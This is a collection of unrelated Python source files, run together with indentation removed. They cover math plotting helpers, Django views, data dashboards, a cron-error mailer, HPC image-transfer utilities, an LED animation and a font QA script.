def determine_period(xvals, yvals, acc=1e-8):
""" Function that determines whether or not x and y values is periodic; if the
values are periodic, the period is returned as well as the values that make
up the period. If no period is detected None is returned. The way this
function determines whether or not a list is periodic, is by looping over a
part of the values. The loop is started at the second to last point, and
moves towards previous points. For each point it is checked whether or not
the x and y values correspond to the last point in the list; if this is the
case we have detected that the list is most likely periodic. This is might
not always be the case as some point might be very close to the end point
while the list is still not periodic. To deal with this it is possible to
adjust the 'acc' parameter which determines how close the point should be to
the end point for it to 'count' as the same point. To increase the speed, a
only the last 10% of the list will be checked for periodicty; therefore this
works best for relatively large lists.
Input: xvals = list containing the x values that will be checked (list);
yvals = list containing the y values that will be checked (list);
acc = accuracy of how close the points should be to count (float);
Returns: period = the detected period (integer);
list containing the x values that make up the period (list);
list containing the y values that make up the period (list);
OR: None
"""
# Checking if the x and y lists have the same length
if len(xvals) != len(yvals):
raise Exception("xvals and yvals must have the same length")
# Finding the length and maximum period of the list
L = len(xvals)
max_period = int(L/10)
# Determining the end point
end_point = (xvals[-1], yvals[-1])
# The current period
period = 1
# Looping over the values in the list, going from last entries to first
for i in range(L-2, L-max_period, -1):
# Checking if the end point occured earlier in the list
if check_limit(end_point, xvals[i], yvals[i], acc=acc):
return period, xvals[i:-1], yvals[i:-1]
# Period increases with 1
period += 1
return None
def solve_eig_vals(xp, av, bv):
""" Function that finds the eigenvalues of the Jacobian matrix of the Hénon map by solving the
characteristic equation. Imaginary solutions are not included and only the real part is used.
Input: xp = the x coordinate at which the eigenvalues have to be found (float);
av = the a parameter of the Hénon map (float);
bv = the b parameter of the Hénon map (float);
Returns: sol1 = the first and largest eigenvalue at the given point (float);
sol2 = the second and smallest eigenvalue at the given point (float).
"""
# Solving the characteristic equation of the Jacobian matrix at the point
mult = av * xp
sqrt_val = sqrt(mult*mult + bv).real
# The solutions
sol1 = -mult + sqrt_val
sol2 = -mult - sqrt_val
return sol1, sol2
def line_height(value, lower_Val, diff):
""" Function that calculates the hight, on a scale from 0 to 1, for a vertical or horizontal
line. The input 'value' gives the absolute hight of where the vertical line should be.
'lower_Val' gives the lower bound of the plot; 'diff' gives the difference in the upper
bound and the lower bound of the plot. The output 'height' returns the height of the
vertical line.
Input: value = absolute hight of the vertical line (float);
lower_Val = the lower bound of the plot (float);
Diff = the difference in upper and lower bound of the plot (float);
Returns: height = the height of the vertical line (float).
"""
# Checking if the value of Yvalue < 0
if value < 0:
height = abs((value + lower_Val) / diff)
# For all other cases
else:
height = abs((value - lower_Val) / diff)
return height
def create_box(box_lim, Xbound, Ybound):
""" Function that creates the relative limits for the horizontal and vertical lines
for a box. These relative limits can be used for matplotlib.pyplot.axvline and
axhline functions; however in reality often the matplotlib.pyplot.vlines and
hlines are easier to use as they make use of the absolute limits. 'box_lim'
gives the limits of the boxes in dictionary form containing an 'x' and 'y'
component. 'Xbound' gives the x boundary of the plot, so it contains the upper
and lower limit. 'Ybound' is the exact same as 'Xbound' but now for the y
boundaries. The output is a dictionary containing the relative heights of the
box limits relative to the plot; the syntax is the same as the input 'box_lim'.
Input: box_lim = the limits of the box (dictionary);
Xbound = x boundaries of the plot (tuple);
Ybound = y boundaries of the plot (tuple);
Returns: all_vals = the limits of the box relative to the plot (dictionary).
"""
# Finding the start and end values of the box
Xstart, Xend = min(box_lim['x']), max(box_lim['x'])
Ystart, Yend = min(box_lim['y']), max(box_lim['y'])
# Calculating the minimum value of the bounds
X_Min = np.min(Xbound)
Y_Min = np.min(Ybound)
# Finding the difference between maximum and minimum bounds
X_Difference = np.max(Xbound) - X_Min
Y_Difference = np.max(Ybound) - Y_Min
# Finding the lowest x and y values for the box
X_Low = line_height(Xstart, X_Min, X_Difference)
Y_Low = line_height(Ystart, Y_Min, Y_Difference)
# Finding the highest x and y values for the box
x_height = line_height(Xend, X_Min, X_Difference)
y_height = line_height(Yend, Y_Min, Y_Difference)
# Combining the found values
all_vals = {'x': (X_Low, x_height), 'y': (Y_Low, y_height)}
return all_vals
|
import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.utils.translation import gettext as _
# Create your models here.
class Profile(AbstractUser):
birthday = models.DateField(_('Birthday'), default=datetime.date.today)
genderlist = (
(1, 'Man'),
(2, 'Woman'),
)
gender = models.IntegerField(_('Gender'), null=True, blank=True, choices=genderlist, default=1)
profile = models.TextField(_('Profile'), null=True, blank=True)
def __str__(self):
return self.email
|
"""This is a program to evaluate the restaurant grades of NYC establishments across New York City."""
#author: Matthew Dunn
#netID: mtd368
#date: 12/06/2015
import os
import sys
from dataloader import *
from dataanalyzer import *
from visualizer import *
def main():
try:
while True:
try:
print "\nLoading Data for NYC Restaurants..."
data = loadrestaurantData()
listofBoros = data.BORO.unique()
print "\nAnalyzing Grade Scores over time...."
nycrestaurantgrades = retaurantGradeAnalyzer(data, listofBoros)
print "\nPlotting number of restaurants at given grade over time for all of NYC...."
nycrestaurantgrades.restsbygradeovertime()
print "\nPlotting number of restaurants at given grade over time for each Borough...."
nycrestaurantgrades.createsingleborotoplot()
print "\nComputing Grade Scores for each Borough, this could take a while, so grab a cup of coffee...."
restaurant_analyzer(data)
break
except ValueError:
print "\nHouston, we have a problem..."
break
except KeyboardInterrupt:
print "\n Interrupted!"
except EOFError:
print "\n Interrupted!"
if __name__ == '__main__':
main()
|
import numpy as np
def dict_mean(dict_list):
mean_dict = {}
for key in dict_list[0].keys():
value = []
for i in dict_list:
value.append(i[key])
mean_dict[key] = np.mean(value)
return mean_dict
|
import pydeck as pdk
import datetime
import bar_chart_race as bcr
import math
import altair as alt
from altair import Chart, X, Y, Axis, SortField, OpacityValue
import plotly.figure_factory as ff
import matplotlib.pyplot as plt
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import pandas as pd
import numpy as np
import time
import streamlit as st
#TODO must add secrets.toml entire text into streamlit secrets during deployment
scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']
import json
key_dict = json.loads(st.secrets["textkey"])
creds = ServiceAccountCredentials.from_json_keyfile_dict(key_dict, scope)
client = gspread.authorize(creds)
#Change to your Google Sheets Name
#can add more spreadsheets as in example - spreadsheets = ['dummy_10k_response','dummy_data_pcr_test']
spreadsheets = ['Mommys Milk Bar']
def main(spreadsheets):
df = pd.DataFrame()
for spreadsheet in spreadsheets:
# Open the Spreadsheet
sh = client.open(spreadsheet)
# Get all values in the first worksheet
worksheet = sh.get_worksheet(0)
data = worksheet.get_all_values()
# Save the data inside the temporary pandas dataframe
df_temp = pd.DataFrame(columns=[i for i in range(len(data[0]))])
for i in range(1, len(data)):
df_temp.loc[len(df_temp)] = data[i]
#Convert column names
column_names = data[0]
df_temp.columns = [convert_column_names(x) for x in column_names]
# Data Cleaning
#df_temp['Response'] = df_temp['Response'].replace({'': 'Yes'})
# Concat Dataframe
df = pd.concat([df, df_temp])
return df # added this line. Delete when writing to csv. Testing for combined file, trying to return function to df.
# API Limit Handling
time.sleep(5)
#this line below does nothing after the return df was added above. Output file outside of function
#df.to_csv('10k_survey_google_output.csv', index=False)
def convert_column_names(x):
if x == 'Timestamp':
return 'date_time'
elif x == 'Feeding duration (left)':
return 'duration_left'
elif x == 'Diaper Check':
return 'diaper'
elif x == 'Pumping duration (minutes)':
return 'pump_duration'
elif x == 'Supplemental Feeding (nearest ounce)':
return 'supplement_ounces'
elif x == 'Vitamin D':
return 'Vitamin_D'
elif x == "Mommy's Medication [Ibuprofen]":
return 'Ibuprofen'
elif x == "Mommy's Medication [Paracetamol]":
return 'Paracetamol'
elif x == "Mommy's Medication [Fluoxetine]":
return 'Fluoxetine'
elif x == 'Feeding duration (right)':
return 'duration_right'
elif x == "Mommy's Medication [Prenatal vitamin]":
return 'prenatal'
else:
return x
print('scraping form data')
df = main(spreadsheets)
print(df)
data = df
data['date_time'] = pd.to_datetime(data['date_time']) # this creates an odd time stamp in streamlit. Not required.
#OPTION TO WRITE TO CSV
#data.to_csv('sweetpea.csv', index = False)
st.title("Mommy's Milk Bar")
st.image('./Eat_Local.jpg', caption="Eat Local at Mommy's Milk Bar")
st.subheader('Record wiggles here https://docs.google.com/forms/d/e/1FAIpQLSdlKkmgFKdIyj7wT4I2QdPqNUI6DZWliE4vH4EWE59z6kwqPg/viewform?vc=0&c=0&w=1&flr=0')
st.subheader("Mommy's Milk Bar House Rules: No fussin', no cussin', open 24/7")
st.write(data)
st.altair_chart(alt.Chart(data)
.mark_rect()
.encode(
alt.X('hours(date_time):O', title='hour'),
alt.Y('monthdate(date_time):O', title='day'),
color='count(data):Q',
tooltip=[
alt.Tooltip('hours(date_time):O', title='hour'),
alt.Tooltip('count(data):Q', title='action'),
alt.Tooltip('count(diaper):Q', title='diaper')
]
).properties(
title='All the milk bar activities'
))
st.title("Wiggles by hour")
hour_selected = st.slider("Select hour of wiggles", 0, 23)
# FILTERING DATA BY HOUR SELECTED
data = data[data['date_time'].dt.hour == hour_selected]
# FILTERING DATA FOR THE HISTORGRAM
filtered = data[
(data['date_time'].dt.hour >= hour_selected) & (data['date_time'].dt.hour < (hour_selected + 1))
]
hist = np.histogram(filtered['date_time'].dt.minute, bins=60, range=(0, 60))[0]
chart_data = pd.DataFrame({"minute": range(60), "movement": hist})
#LAYING OUT THE HISTOGRAM SECTIONs
st.write("")
st.write("**Wiggles per minute between %i:00 and %i:00**" % (hour_selected, (hour_selected + 1) % 24))
st.altair_chart(alt.Chart(chart_data)
.mark_area(
interpolate='step-after',
).encode(
x=alt.X("minute:Q", scale=alt.Scale(nice=False)),
y=alt.Y("movement:Q"),
tooltip=['minute', 'movement']
).configure_mark(
opacity=0.5,
color='blue'
), use_container_width=True)
st.line_chart(data)
st.write(data)
|
from django.shortcuts import render
from .models import Profile, Post
from django.shortcuts import get_object_or_404
from django.views import generic
from .models import Post, Profile
from django.views.generic import CreateView, UpdateView, DeleteView
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.views.generic import View
from .forms import UserForm
# Create your views here.
'''
def index_profile(request):
all_profiles = Profile.objects.all()
context = {'all_profiles':all_profiles}
return render(request, 'protest/index_profile.html', context)
def detail_profile(request, profile_id):
profile = get_object_or_404(Profile, pk=profile_id)
context = {'profile':profile}
return render(request, 'protest/detail_profile.html', context)
def index_post(request):
all_posts = Post.objects.all()
context = {'all_posts': all_posts}
return render(request, 'protest/index_post.html', context)
def detail_post(request, post_id):
post = get_object_or_404(Post, pk=post_id)
context = {'post': post}
return render(request, 'protest/detail_post.html', context)
'''
class IndexViewPost(generic.ListView):
template_name = 'protest/index_post.html'
context_object_name = 'all_posts'
def get_queryset(self):
return Post.objects.all()
class DetailViewPost(generic.DetailView):
model = Post
template_name = 'protest/detail_post.html'
class IndexViewProfile(generic.ListView):
template_name = 'protest/index_profile.html'
context_object_name = 'all_profiles'
def get_queryset(self):
return Profile.objects.all()
class DetailViewProfile(generic.DetailView):
model = Profile
template_name = 'protest/detail_profile.html'
class PostCreate(CreateView):
model = Post
fields=['profile_id','subject', 'description', 'organizing_committee', 'age_group', 'incident', 'tag', 'concerned_authority','picture']
class PostUpdate(UpdateView):
model = Post
fields=['profile_id','subject', 'description', 'organizing_committee', 'age_group', 'incident', 'tag', 'concerned_authority','picture']
class PostDelete(DeleteView):
model = Post
success_url = reverse_lazy('protest:index_post')
class UserFormView(View):
form_class = UserForm
template_name = 'protest/registration_form.html'
#display a blank form for a new user
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form':form})
#register and add user to the db
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
# clean and normalized data
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
#returns User objects if the credentials are correct
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
#request.user for later purpose
#now redirect them to the home page
return redirect('protest:index_post')
return render(request, self.template_name, {'form': form})
|
import math
cache = {}
def get_cached(x1, y1, x2, y2):
key = ','.join(str(l) for l in locals().values())
result = cache.get(key)
if not result:
result = robot_paths_recursive(x1, y1, x2, y2)
cache[key] = result
return result
def robot_paths_recursive(x1, y1, x2, y2):
if x1 > x2:
return 0
if y1 > y2:
return 0
if x1 == (x2 - 1) and y1 == y2:
return 1
if y1 == (y2 - 1) and x1 == x2:
return 1
if x1 == x2 and y1 == y2:
return 1
return get_cached(x1 + 1, y1, x2, y2) + get_cached(x1, y1 + 1, x2, y2)
def robot_paths(x, y):
return robot_paths_recursive(0, 0, x, y)
def robot_paths_fast(x, y):
return math.factorial(x + y) // (math.factorial(x) * math.factorial(y))
assert robot_paths(0, 0) == robot_paths_fast(0, 0) == 1
assert robot_paths(1, 1) == robot_paths_fast(1, 1) == 2
assert robot_paths(2, 2) == robot_paths_fast(2, 2) == 6
assert robot_paths(3, 3) == robot_paths_fast(3, 3) == 20
assert robot_paths(5, 100) == robot_paths_fast(5, 100) == 96560646
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# send_error_list_email.py: read the current error lists and send out email #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Oct 27, 2021 #
# #
#########################################################################################
import sys
import os
import string
import re
import getpass
import socket
import random
import time
import datetime
import Chandra.Time
#
#--- reading directory list
#
path = '/data/mta/Script/Cron_check/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append pathes to private folders to a python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import mta_common_functions as mcf #---- contains other functions commonly used in MTA scripts
#
#--- check whose account, and set a path to temp location
#
user = getpass.getuser()
user = user.strip()
#
#---- find host machine name
#
machine = socket.gethostname()
machine = machine.strip()
#
#--- possible machine names and user name lists
#
cpu_list = ['colossus-v', 'c3po-v', 'r2d2-v', 'boba-v']
usr_list = ['mta']
cpu_usr_list = ['colossus-v_mta', 'r2d2-v_mta', 'boba-v_mta', 'c3po-v_mta',]
#'c3po-v_cus', 'r2d2-v_cus', 'boba-v_cus']
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
email_list = ['mtadude@cfa.harvard.edu',]
#--------------------------------------------------------------------------------------------------
#-- report_error: read errors from <cup_usr_list>_error_list, sort it out, clean, and send out email
#--------------------------------------------------------------------------------------------------
def report_error():
"""
read errors from <cup_usr_list>_error_list, sort it out, clean, and send out email
Input: none but read from <cup_usr_list>_error_list
Output: email sent out
"""
#
#--- find the current time
#
out = time.strftime('%Y:%m:%d', time.gmtime())
[year, mon, day] = re.split(':', out)
#
#--- set cutting date for the report
#
out = time.strftime('%Y:%j:%H:%M:%S', time.gmtime())
cut = Chandra.Time.DateTime(out).secs - 1.5 * 86400.0
#
#--- create surfix for files which will be saved in Past_errors directory
#
smon = mcf.add_leading_zero(mon)
sday = mcf.add_leading_zero(day, dlen=3)
tail = str(year) + smon + sday
for tag in cpu_usr_list:
efile = house_keeping + 'Records/' + tag + '_error_list'
pfile = house_keeping + 'Records/Past_errors/' + tag + '_error_list_' + tail
prev_line = ''
if os.path.isfile(efile):
#
#--- read error messages from the file
#
data = mcf.read_data_file(efile)
#
#--- sort the data so that we can correct messages to each cron job together
#
data.sort()
task_list = []
time_list = []
mssg_list = []
for ent in data:
atemp = re.split(' : ' , ent)
otime = int(float(atemp[1]))
dtime = mcf.convert_date_format(str(otime), ifmt='%Y%m%d%H%M%S', ofmt='%Y:%j:%H:%M:%S')
#
#--- if the error is more than <cut> day old, ignore
#
stime = Chandra.Time.DateTime(dtime).secs
if stime < cut:
continue
if atemp[2].strip() == '':
continue
task_list.append(atemp[0])
time_list.append(dtime)
mssg_list.append(atemp[2])
#
#--- write out cron job name
#
cname = task_list[0]
sline = '\n\n' + cname + '\n____________________\n\n'
for i in range(1, len(mssg_list)):
if task_list[i] != cname:
cname = task_list[i]
sline = sline + '\n\n' + cname + '\n____________________\n\n'
#
#--- create each line. if it is exactly same as one line before, skip it
#
line = time_list[i] + ' : ' + mssg_list[i] + '\n'
if ent != prev_line:
sline = sline + line
prev_line = ent
with open(zspace, 'w') as fo:
fo.write(sline)
#
#--- send email out
#
send_mail(tag, email_list)
#
#--- move the error list to Past_errors directory
#
if os.path.isfile(efile): #--- 03/06/19
cmd = 'mv ' + efile + ' ' + pfile
os.system(cmd)
#--------------------------------------------------------------------------------------------------
#-- send_mail: sending email out ---
#--------------------------------------------------------------------------------------------------
def send_mail(tag, email_list):
"""
sending email out
Input: tag --- user and machine name in the form of c3po-v_mat
email_list --- a list of email address
Output: email sent out
"""
if os.path.isfile(zspace):
if os.stat(zspace).st_size > 0:
atemp = re.split('_', tag)
for email_address in email_list:
cmd = 'cat ' + zspace + '| /usr/bin/tr -cd "\11\12\15\40-\176" | mailx -s "Subject: Cron Error : '
cmd = cmd + atemp[1] + ' on ' + atemp[0] + '" ' + email_address
os.system(cmd)
mcf.rm_files(zspace)
#--------------------------------------------------------------------------------------------------
if __name__ == '__main__':
report_error()
|
from flask import Flask
import csv
import json
import pandas as pd
from datetime import date, timedelta
app = Flask(__name__)
class controllerAmurel:
cities = [
{
'name': 'Armazém',
'population': 8674
},
{
'name': 'Imaruí',
'population': 11672
},
{
'name': 'Pescaria Brava',
'population': 10091
},
{
'name': 'São Martinho',
'population': 3180
},
{
'name': 'Braço do Norte',
'population': 33450
},
{
'name': 'Imbituba',
'population': 44853
},
{
'name': 'Rio Fortuna',
'population': 4611
},
{
'name': 'Treze de Maio',
'population': 7081
},
{
'name': 'Capivari de Baixo',
'population': 24871
},
{
'name': 'Jaguaruna',
'population': 20024
},
{
'name': 'Sangão',
'population': 12678
},
{
'name': 'Tubarão',
'population': 105686
},
{
'name': 'Grão-Pará',
'population': 6223
},
{
'name': 'Laguna',
'population': 45814
},
{
'name': 'Santa Rosa de Lima',
'population': 2142
},
{
'name': 'Gravatal',
'population': 11501
},
{
'name': 'Pedras Grandes',
'population': 3976
},
{
'name': 'São Ludgero',
'population': 13410
}
]
data = pd.DataFrame()
path = 'app/file/caso_full.csv'
def __init__(self):
print('init')
def get_data(self):
yesterday = date.today() - timedelta(days=1)
yesterday = yesterday.strftime('%Y-%m-%d')
df = pd.read_csv(self.path, header=0)
for city in self.cities:
newdf = df[(df.city == city['name']) & (df.date == yesterday)]
self.data = pd.concat([self.data, newdf])
# self.data.to_csv('app/file/caso_teste.csv')
return self.data.to_json(orient='records')
# return json.dumps(self.data)
def get_data_daily(self):
df = pd.read_csv(self.path, header=0)
for city in self.cities:
newdf = df[(df.city == city['name'])]
self.data = pd.concat([self.data, newdf])
# self.data.to_csv('app/file/caso_teste.csv')
return self.data.to_json(orient='records')
# return json.dumps(self.data)
|
#!/usr/bin/env python
import os
import subprocess
"""
Shifter, Copyright (c) 2015, The Regents of the University of California,
through Lawrence Berkeley National Laboratory (subject to receipt of any
required approvals from the U.S. Dept. of Energy). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the University of California, Lawrence Berkeley
National Laboratory, U.S. Dept. of Energy nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.`
See LICENSE for full text.
"""
def _shCmd(system, *args):
if len(args) == 0:
return None
return args
def _cpCmd(system, localfile, targetfile):
return ['cp', localfile, targetfile]
def _sshCmd(system, *args):
if len(args) == 0:
return None
ssh = ['ssh']
### TODO think about if the host selection needs to be smarter
### also, is this guaranteed to be an iterable object?
hostname = system['host'][0]
username = system['ssh']['username']
if 'key' in system['ssh']:
ssh.extend(['-i','%s' % system['ssh']['key']])
if 'sshCmdOptions' in system['ssh']:
ssh.extend(system['ssh']['sshCmdOptions'])
ssh.extend(['%s@%s' % (username, hostname)])
ssh.extend(args)
return ssh
def _scpCmd(system, localfile, remotefile):
ssh = ['scp']
### TODO think about if the host selection needs to be smarter
### also, is this guaranteed to be an iterable object?
hostname = system['host'][0]
username = system['ssh']['username']
if 'key' in system['ssh']:
ssh.extend(['-i','%s' % system['ssh']['key']])
if 'scpCmdOptions' in system['ssh']:
ssh.extend(system['ssh']['scpCmdOptions'])
ssh.extend([localfile, '%s@%s:%s' % (username, hostname, remotefile)])
return ssh
def _execAndLog(cmd, logger):
if logger is not None:
logger.info("about to exec: %s" % ' '.join(cmd))
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if proc is None:
if logger is not None:
logger.error("Could not execute '%s'" % ' '.join(cmd))
return
stdout,stderr = proc.communicate()
if logger is not None:
if stdout is not None and len(stdout) > 0:
logger.debug("%s stdout: %s" % (cmd[0], stdout.strip()))
if stderr is not None and len(stderr) > 0:
logger.error("%s stderr: %s" % (cmd[0], stderr.strip()))
return proc.returncode
def copy_file(filename, system, logger=None):
shCmd = None
cpCmd = None
baseRemotePath = None
if system['accesstype'] == 'local':
shCmd = _shCmd
cpCmd = _cpCmd
baseRemotePath = system['local']['imageDir']
elif system['accesstype'] == 'remote':
shCmd = _sshCmd
cpCmd = _scpCmd
baseRemotePath = system['ssh']['imageDir']
else:
raise NotImplementedError('%s is not supported as a transfer type' % system['accesstype'])
(basePath,imageFilename) = os.path.split(filename)
remoteFilename = os.path.join(baseRemotePath, imageFilename)
remoteTempFilename = os.path.join(baseRemotePath, '%s.XXXXXX.partial' % imageFilename)
# pre-create the file with a temporary name
# TODO: Add command to setup the file with the right striping
preCreate = shCmd(system, 'mktemp', remoteTempFilename)
if logger is not None:
logger.info('about to exec: %s' % ' '.join(preCreate))
proc = subprocess.Popen(preCreate, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
remoteTempFilename = None
if proc is not None:
stdout,stderr = proc.communicate()
if proc.returncode == 0:
remoteTempFilename = stdout.strip()
else:
raise OSError('Failed to precreate transfer file, %s (%d)' % (stderr, proc.returncode))
if len(stderr) > 0 and logger is not None:
logger.error("%s stderr: %s" % (preCreate[0], stderr.strip()))
if remoteTempFilename is None or not remoteTempFilename.startswith(baseRemotePath):
raise OSError('Got unexpected response back from tempfile precreation: %s' % stdout)
copyret = None
try:
copy = cpCmd(system, filename, remoteTempFilename)
copyret = _execAndLog(copy, logger)
except:
rmCmd = shCmd(system, 'rm', remoteTempFilename)
_execAndLog(rmCmd, logger)
raise
if copyret == 0:
try:
mvCmd = shCmd(system, 'mv', remoteTempFilename, remoteFilename)
ret = _execAndLog(mvCmd, logger)
return ret == 0
except:
### we might also need to remove remoteFilename in this case
rmCmd = shCmd(system, 'rm', remoteTempFilename)
_execAndLog(rmCmd, logger)
raise
return False
#def remove_local(filename,system):
# (basePath,imageFilename) = os.path.split(filename)
# targetFilename = os.path.join(system['local']['imageDir'], imageFilename)
# os.unlink(targetFilename)
# return True
def remove_file(filename, system, logger=None):
shCmd = None
baseRemotePath = None
if system['accesstype'] == 'local':
shCmd = _shCmd
baseRemotePath = system['local']['imageDir']
elif system['accesstype'] == 'remote':
shCmd = _sshCmd
baseRemotePath = system['ssh']['imageDir']
(basePath,imageFilename) = os.path.split(filename)
remoteFilename = os.path.join(baseRemotePath, imageFilename)
rmCmd = shCmd(system, 'rm','-f', remoteFilename)
_execAndLog(rmCmd, logger)
return True
def transfer(system,imagePath,metadataPath=None,logger=None):
if metadataPath is not None:
copy_file(metadataPath, system, logger)
if copy_file(imagePath,system, logger):
return True
if logger is not None:
logger.error("Transfer of %s failed" % imagePath)
return False
def remove(system,imagePath,metadataPath=None,logger=None):
if metadataPath is not None:
remove_file(metadataPath, system)
if remove_file(imagePath,system):
return True
if logger is not None:
logger.error("Remove of %s failed" % imagePath)
return False
|
# ## PixelPingPong ##
# This animation runs 1 or many pixels from one end of a strip to the other.
#
# ### Usage ###
# Alternates has 3 optional properties
#
# * max_led - int the number of pixels you want used
# * color - (int, int, int) the color you want the pixels to be
# * additional_pixels - int the number of pixels you want to ping pong
#
# In code:
#
# from PixelPingPong import PixelPingPong
# ...
# anim = PixelPingPong(led, max_led=30, color=(0, 0, 255), additional_pixels=5)
#
# Best run in the region of 5-200 FPS
from bibliopixel.animation import *
class PixelPingPong(BaseStripAnim):
def __init__(self, led, max_led=-1, color=(255, 255, 255), additional_pixels=0):
super(PixelPingPong, self).__init__(led, 0, -1)
self._current = 0
self._minLed = 0
self._maxLed = max_led
if self._maxLed < 0 or self._maxLed < self._minLed:
self._maxLed = self._led.lastIndex
self._additionalPixels = additional_pixels
self._positive = True
self._color = color
def step(self, amt=1):
self._led.fill((0, 0, 0), 0, self._maxLed)
self._led.fill(self._color, self._current, self._current + self._additionalPixels)
if self._positive:
self._current += 1
else:
self._current -= 1
if self._current + self._additionalPixels == self._maxLed:
self._positive = False
if self._current == self._minLed:
self._positive = True
|
#MenuTitle: Check Font
'''
Check family for GlyphsApp
~~~~~~~~~~~~~~~~~~~~~~~~~~
Check selected family passes qa.yml spec and common font errors.
Refer to README for further info.
'''
import vanilla
import os
import glob
import sys
import yaml
import re
script_path = glob.glob(r'/Users/*/Library/Application Support/Glyphs/Scripts/mf-glyphs-scripts')[0]
sys.path.append(script_path)
from QA import (
find_duplicate_glyphs,
has_outlines,
uni00a0_width,
font_name,
)
__version__ = 0.1
__author__ = 'Marc Foley'
class GlyphsUI(object):
'''Dialog for enabling/disabling checks'''
def __init__(self, config_file):
self.w = vanilla.FloatingWindow((330, 500), "QA Selected Font", minSize=(300,500), maxSize=(1000,700))
self.leading = 14
self.head_count = 0
self._heading('Meta Data')
# iterate over config file and add each entry
for key in config_file:
self._checkbox(key, '%s' % key)
self._checkbox('check_family_name', "Check font name has ASCII chars only")
# Vertical Metrics
self._heading('Vertical Metrics:')
self._checkbox('metrics_fam_vals', "Instances/Masters have same values")
# Check Glyphs
self._heading('Glyphs:')
self._checkbox('glyph_no_dups', "No duplicate glyphs")
self._checkbox('glyph_nbspace_space', "nbspace and space are same width")
self._checkbox('glyphs_missing_conts_or_comps', "Glyphs missing contours or components")
# Check
self.w.button = vanilla.Button((14, self.leading+40, 300, 20), "Check", callback=self.buttonCallback)
# Resize window to fit all tests
self.w.setPosSize((100.0, 100.0, 350.0, self.leading + 75))
self.w.open()
def _heading(self, title):
self.leading += 20
setattr(self.w, 'text%s' % self.head_count, vanilla.TextBox((14, self.leading, 300, 14), title, sizeStyle='small'))
self.leading += 12
self.head_count += 1
setattr(self.w, 'rule%s' % self.head_count, vanilla.HorizontalLine((14, self.leading, 300, 14)))
self.leading += 12
def _checkbox(self, attr, title, value=True):
setattr(self.w, attr, vanilla.CheckBox((14, self.leading, 300, 20), title, value=value))
self.leading += 20
def buttonCallback(self, sender):
main(**self.w.__dict__)
def check_field(key, yml, font, fix=False):
'''Check if a font's attribute matches the yml document'''
if 'any' in str(yml):
print 'PASS: font %s has attribute\n' % key
elif yml != font:
print 'ERROR: font %s is not equal to yml %s\n' % (key, key)
else:
print 'PASS: font %s is equal to yml %s\n' % (key, key)
if fix:
font = yml
def font_field(font, key):
'''Check font has key'''
if hasattr(font, key):
return getattr(font, key)
if key in font.customParameters:
return font.customParameters[key]
return None
def main_glyphs():
qa_spec = yaml.safe_load(open(script_path + '/QA/qa.yml', 'r'))
ui = GlyphsUI(qa_spec)
def main(**kwargs):
font = Glyphs.font
qa_spec = yaml.safe_load(open(script_path + '/QA/qa.yml', 'r'))
if 'glyph_no_dups' in kwargs and kwargs['glyph_no_dups'].get() == 1:
find_duplicate_glyphs.find([g.name for g in font.glyphs])
if 'check_family_name' in kwargs and kwargs['check_family_name'].get() == 1:
font_name.check_family_name(font.familyName)
print '***Check Meta Data***'
for key in qa_spec:
font_attrib = font_field(font, key)
if font_attrib:
check_field(key, qa_spec[key], font_attrib)
else:
print ('ERROR YML DOC: Attribute %s does not exist for font\n' % key)
if 'glyphs_missing_conts_or_comps' in kwargs and kwargs['glyphs_missing_conts_or_comps'].get() == 1:
has_outlines.check(font)
if 'glyph_nbspace_space' in kwargs and kwargs['glyph_nbspace_space'].get() == 1:
uni00a0_width.check(font, font.masters)
if __name__ == '__main__':
main_glyphs()
|
from __future__ import absolute_import
# import models into model package
from .ads_provider_controllers import AdsProviderControllers
from .ads_provider_controllers_controller import AdsProviderControllersController
from .ads_provider_domains import AdsProviderDomains
from .ads_provider_domains_domain import AdsProviderDomainsDomain
from .ads_provider_search import AdsProviderSearch
from .ads_provider_search_object import AdsProviderSearchObject
from .audit_settings import AuditSettings
from .audit_settings_settings import AuditSettingsSettings
from .audit_topic import AuditTopic
from .audit_topic_create_params import AuditTopicCreateParams
from .audit_topic_extended import AuditTopicExtended
from .audit_topics import AuditTopics
from .audit_topics_extended import AuditTopicsExtended
from .auth_access import AuthAccess
from .auth_access_access_item import AuthAccessAccessItem
from .auth_access_access_item_file import AuthAccessAccessItemFile
from .auth_access_access_item_permissions import AuthAccessAccessItemPermissions
from .auth_access_access_item_relevant_ace import AuthAccessAccessItemRelevantAce
from .auth_access_access_item_user import AuthAccessAccessItemUser
from .auth_group import AuthGroup
from .auth_group_create_params import AuthGroupCreateParams
from .auth_group_extended import AuthGroupExtended
from .auth_groups import AuthGroups
from .auth_groups_extended import AuthGroupsExtended
from .auth_id import AuthId
from .auth_id_ntoken import AuthIdNtoken
from .auth_id_ntoken_privilege_item import AuthIdNtokenPrivilegeItem
from .auth_netgroup import AuthNetgroup
from .auth_netgroups import AuthNetgroups
from .auth_privilege import AuthPrivilege
from .auth_privileges import AuthPrivileges
from .auth_role import AuthRole
from .auth_role_create_params import AuthRoleCreateParams
